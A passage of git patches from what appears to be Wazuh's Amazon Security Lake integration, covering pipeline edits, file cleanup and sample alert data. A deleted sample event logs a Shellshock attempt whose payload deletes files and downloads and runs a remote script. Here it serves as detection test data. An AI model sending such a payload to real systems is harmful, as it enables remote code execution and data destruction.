diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh
deleted file mode 100644
index 2d173c2943692..0000000000000
--- a/integrations/docker/wazuh-certs-generator/entrypoint.sh
+++ /dev/null
@@ -1,67 +0,0 @@ -#!/bin/bash -# Wazuh Docker Copyright (C) 2017, Wazuh Inc. (License GPLv2) - -############################################################################## -# Downloading Cert Gen Tool -############################################################################## - -## Variables -CERT_TOOL=wazuh-certs-tool.sh -PASSWORD_TOOL=wazuh-passwords-tool.sh -PACKAGES_URL=https://packages.wazuh.com/4.8/ -PACKAGES_DEV_URL=https://packages-dev.wazuh.com/4.8/ - -## Check if the cert tool exists in S3 buckets -CERT_TOOL_PACKAGES=$(curl --silent -I $PACKAGES_URL$CERT_TOOL | grep -E "^HTTP" | awk '{print $2}') -CERT_TOOL_PACKAGES_DEV=$(curl --silent -I $PACKAGES_DEV_URL$CERT_TOOL | grep -E "^HTTP" | awk '{print $2}') - -## If cert tool exists in some bucket, download it, if not exit 1 -if [ "$CERT_TOOL_PACKAGES" = "200" ]; then - curl -o $CERT_TOOL $PACKAGES_URL$CERT_TOOL -s - echo "The tool to create the certificates exists in the in Packages bucket" -elif [ "$CERT_TOOL_PACKAGES_DEV" = "200" ]; then - curl -o $CERT_TOOL $PACKAGES_DEV_URL$CERT_TOOL -s - echo "The tool to create the certificates exists in Packages-dev bucket" -else - echo "The tool to create the certificates does not exist in any bucket" - echo "ERROR: certificates were not created" - exit 1 -fi - -cp /config/certs.yml /config.yml - -chmod 700 /$CERT_TOOL - -############################################################################## -# Creating Cluster certificates -############################################################################## - -## Execute cert tool and parsin cert.yml to set UID permissions -source /$CERT_TOOL -A -nodes_server=$( cert_parseYaml /config.yml | grep nodes_server__name | sed 's/nodes_server__name=//' ) -node_names=($nodes_server) - -echo "Moving created certificates to the destination directory" -cp /wazuh-certificates/* /certificates/ -echo "Changing certificate permissions" -chmod 700 /certificates -chmod 440 /certificates/* -echo "Setting UID indexer and 
dashboard" -chown -R 1000:1000 /certificates -#echo "Setting UID for wazuh manager and worker" -#cp /certificates/root-ca.pem /certificates/root-ca-manager.pem -#cp /certificates/root-ca.key /certificates/root-ca-manager.key -#chown 101:101 /certificates/root-ca-manager.pem -#chown 101:101 /certificates/root-ca-manager.key - -#for i in ${node_names[@]}; -#do -# chown 101:101 "/certificates/${i}.pem" -# chown 101:101 "/certificates/${i}-key.pem" -#done - -for i in /certificates/*key* -do - chmod 400 $i -done - From 21f89f887f8846b59fd86823581658868855d3e0 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 16:17:59 -0300 Subject: [PATCH 65/77] Set indexer hostname right in pipeline file --- .../logstash/pipeline/indexer-to-integrator.conf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 7784619a799ea..e567587aebc69 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -1,6 +1,6 @@ input { opensearch { - hosts => ["opensearch-node:9200"] + hosts => ["wazuh.indexer:9200"] user => "${INDEXER_USERNAME}" password => "${INDEXER_PASSWORD}" ssl => true From 6938a5456ee66525736a269ee930b218faf4ba0b Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 26 Feb 2024 08:22:16 -0300 Subject: [PATCH 66/77] Change timestamp field in pipeline --- .../pipeline/indexer-to-integrator.conf | 54 ++++++++++--------- 1 file changed, 30 insertions(+), 24 deletions(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index e567587aebc69..4249ef6473033 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf 
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -1,32 +1,33 @@ input { - opensearch { - hosts => ["wazuh.indexer:9200"] - user => "${INDEXER_USERNAME}" - password => "${INDEXER_PASSWORD}" - ssl => true - ca_file => "/usr/share/logstash/root-ca.pem" - index => "wazuh-alerts-4.x-*" - query => '{ - "query": { - "range": { - "@timestamp": { - "gt": "now-1m" - } - } - } - }' - target => "_source" - schedule => "* * * * *" - } + opensearch { + hosts => ["wazuh.indexer:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" + index => "wazuh-alerts-4.x-*" + query => '{ + "query": { + "range": { + "timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + ecs_compatibility => disabled + schedule => "* * * * *" + } } output { - stdout - { - id => "standardOutputPipeline" - codec => rubydebug - } + #stdout + #{ + # id => "standardOutputPipeline" + # codec => rubydebug + #} #pipe #{ @@ -36,4 +37,9 @@ output { # command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" #} + file { + id => "fileOutputPipeline" + path => "/tmp/indexer-to-file.json" + } + } From 118b477118021cbefc746796846acab75c0f90f7 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 26 Feb 2024 08:34:14 -0300 Subject: [PATCH 67/77] Clean up unneeded files --- .../amazon-security-lake/parquet/parquet.py | 20 ----- .../amazon-security-lake/parquet/test.py | 11 --- .../wazuh-event.sample.json | 76 ------------------- 3 files changed, 107 deletions(-) delete mode 100644 integrations/amazon-security-lake/parquet/parquet.py delete mode 100644 integrations/amazon-security-lake/parquet/test.py delete mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py deleted file mode 100644 index 79a146f0993a2..0000000000000 
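Review bot: The `@@ -1,32 +1,33 @@` hunk re-indents the whole `input` block, so the two functional changes — the range filter moving from `@timestamp` to `timestamp` and the new `ecs_compatibility => disabled` — are buried in whitespace churn, and the commit message names only the first; keep reformatting in its own commit. Functionally, a `"gt": "now-1m"` window polled by a per-minute `schedule` has no overlap, so an alert whose `timestamp` lags its indexing time by more than a minute is never fetched; state that assumption above the query, e.g. `# Assumes alerts are indexed within 1m of their timestamp; change window and schedule together`. The new `file { path => "/tmp/indexer-to-file.json" }` output grows without bound and holds every alert in clear text on the container's /tmp, so mark it as debug-only in a comment if it is meant to stay.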
--- a/integrations/amazon-security-lake/parquet/parquet.py +++ /dev/null @@ -1,20 +0,0 @@ - -import pyarrow as pa -import pyarrow.parquet as pq -import pyarrow.fs as pafs - - -class Parquet: - - @staticmethod - def encode(data: dict): - return pa.Table.from_pydict(data) - - @staticmethod - def to_s3(data: pa.Table, s3: pafs.S3FileSystem): - pass - - @staticmethod - def to_file(data: pa.Table, path: str): - # pq.write_to_dataset(table=data, root_path=path) - pq.write_table(data, path) diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py deleted file mode 100644 index 2022111b25e33..0000000000000 --- a/integrations/amazon-security-lake/parquet/test.py +++ /dev/null @@ -1,11 +0,0 @@ -#!/usr/bin/python - -import pyarrow as pa -from parquet import Parquet -import json - -# converted_event = {} -with open("wazuh-event.ocsf.json", "r") as fd: - events = [json.load(fd)] - table = pa.Table.from_pylist(events) - Parquet.to_file(table, "output/wazuh-event.ocsf.parquet") diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json deleted file mode 100644 index d7e0558b62c62..0000000000000 --- a/integrations/amazon-security-lake/wazuh-event.sample.json +++ /dev/null 
@@ -1,76 +0,0 @@ -{ - "input": { - "type": "log" - }, - "agent": { - "name": "redacted.com", - "id": "000" - }, - "manager": { - "name": "redacted.com" - }, - "data": { - "protocol": "GET", - "srcip": "000.111.222.10", - "id": "404", - "url": "/cgi-bin/jarrewrite.sh" - }, - "rule": { - "firedtimes": 1, - "mail": false, - "level": 6, - "pci_dss": [ - "11.4" - ], - "tsc": [ - "CC6.1", - "CC6.8", - "CC7.2", - "CC7.3" - ], - "description": "Shellshock attack attempt", - "groups": [ - "web", - "accesslog", - "attack" - ], - "mitre": { - "technique": [ - "Exploitation for Privilege Escalation", - "Exploit Public-Facing Application" - ], - "id": [ - "T1068", - "T1190" - ], - "tactic": [ - "Privilege Escalation", - "Initial Access" - ] - }, - "id": "31166", - "nist_800_53": [ - "SI.4" - ], - "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", - "gdpr": [ - "IV_35.7.d" - ] - }, - "location": "/var/log/nginx/access.log", - "decoder": { - "name": "web-accesslog" - }, - "id": "1707402914.872885", - "GeoLocation": { - "city_name": "Amsterdam", - "country_name": "Netherlands", - "region_name": "North Holland", - "location": { - "lon": 4.9087, - "lat": 52.3534 - } - }, - "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", - "timestamp": "2024-02-08T11:35:14.334-0300" -} \ No newline at end of file From 17b71f01b6669231d4debd8491df77a3f76dcb11 Mon Sep 17 00:00:00 2001 
From: Fede Tux Date: Mon, 26 Feb 2024 08:58:41 -0300 Subject: [PATCH 68/77] Made script available as volume and changed permissions for quick testing --- .../pipeline/indexer-to-integrator.conf | 4 +- .../sl_integration_test.json | 162 ++++++++++++++++++ .../stdin_to_securitylake.py | 2 +- .../transform/__init__.py | 0 .../transform/converter.py | 0 .../transform/models/__init__.py | 0 .../transform/models/ocsf.py | 0 .../transform/models/wazuh.py | 0 integrations/docker/amazon-security-lake.yml | 2 + 9 files changed, 166 insertions(+), 4 deletions(-) create mode 100644 integrations/amazon-security-lake/sl_integration_test.json mode change 100644 => 100755 integrations/amazon-security-lake/transform/__init__.py mode change 100644 => 100755 integrations/amazon-security-lake/transform/converter.py mode change 100644 => 100755 integrations/amazon-security-lake/transform/models/__init__.py mode change 100644 => 100755 integrations/amazon-security-lake/transform/models/ocsf.py mode change 100644 => 100755 integrations/amazon-security-lake/transform/models/wazuh.py diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 4249ef6473033..50e3ec8300674 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -32,9 +32,7 @@ output { #pipe #{ # id => "securityLake" - # message_format => "%{_source}" - # ttl => "10" - # command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + # command => "/usr/share/logstash/bin/run.py --pushinterval 300 --maxlength 2000 --linebuffer 100 --sleeptime 1 --outputfolder s3://" #} file { diff --git a/integrations/amazon-security-lake/sl_integration_test.json b/integrations/amazon-security-lake/sl_integration_test.json new file mode 100644 index 0000000000000..684f9820c5679 
--- /dev/null +++ b/integrations/amazon-security-lake/sl_integration_test.json 
@@ -0,0 +1,162 @@ +{"@version":"1","_source":{"manager":{"name":"ubuntu2204"},"decoder":{"name":"json"},"rule":{"firedtimes":3,"level":3,"tsc":["CC7.1","CC7.2"],"description":"The CVE-2007-4559 that affected python3.10 was solved due to a package removal/update or a system upgrade","groups":["vulnerability-detector"],"id":"23502","mail":false,"pci_dss":["11.2.1","11.2.3"],"gdpr":["IV_35.7.d"]},"location":"vulnerability-detector","timestamp":"2024-02-15T16:05:11.486-0300","id":"1708023911.181468","@timestamp":"2024-02-15T19:05:11.486Z","agent":{"id":"000","ip":"127.0.0.1","name":"localhost"},"input":{"type":"log"},"data":{"vulnerability":{"severity":"Medium","cvss":{"cvss2":{"base_score":"6.800000"}},"type":"Packages","status":"Solved","title":"CVE-2007-4559 affecting python3.10 was solved","package":{"architecture":"amd64","version":"3.10.6-1~22.04.2ubuntu1","name":"python3.10"},"enumeration":"CVE","updated":"2023-09-17T09:15:07Z","published":"2007-08-28T01:17:00Z","reference":"http://secunia.com/advisories/26623, http://www.vupen.com/english/advisories/2007/3022, http://mail.python.org/pipermail/python-dev/2007-August/074292.html, https://bugzilla.redhat.com/show_bug.cgi?id=263261, http://mail.python.org/pipermail/python-dev/2007-August/074290.html, https://security.gentoo.org/glsa/202309-06","cve":"CVE-2007-4559"}}},"@timestamp":"2024-02-15T19:06:00.230246531Z"} +{"@version":"1","_source":{"manager":{"name":"ubuntu2204"},"decoder":{"name":"json"},"rule":{"firedtimes":3,"level":3,"tsc":["CC7.1","CC7.2"],"description":"The CVE-2007-4559 that affected python3.10 was solved due to a package removal/update or a system 
upgrade","groups":["vulnerability-detector"],"id":"23502","mail":false,"pci_dss":["11.2.1","11.2.3"],"gdpr":["IV_35.7.d"]},"location":"vulnerability-detector","timestamp":"2024-02-15T16:05:11.486-0300","id":"1708023911.181468","@timestamp":"2024-02-15T19:05:11.486Z","agent":{"id":"000","ip":"127.0.0.1","name":"localhost"},"input":{"type":"log"},"data":{"vulnerability":{"severity":"Medium","cvss":{"cvss2":{"base_score":"6.800000"}},"type":"Packages","status":"Solved","title":"CVE-2007-4559 affecting python3.10 was solved","package":{"architecture":"amd64","version":"3.10.6-1~22.04.2ubuntu1","name":"python3.10"},"enumeration":"CVE","updated":"2023-09-17T09:15:07Z","published":"2007-08-28T01:17:00Z","reference":"http://secunia.com/advisories/26623, http://www.vupen.com/english/advisories/2007/3022, http://mail.python.org/pipermail/python-dev/2007-August/074292.html, https://bugzilla.redhat.com/show_bug.cgi?id=263261, http://mail.python.org/pipermail/python-dev/2007-August/074290.html, https://security.gentoo.org/glsa/202309-06","cve":"CVE-2007-4559"}}},"@timestamp":"2024-02-15T19:06:00.230246531Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
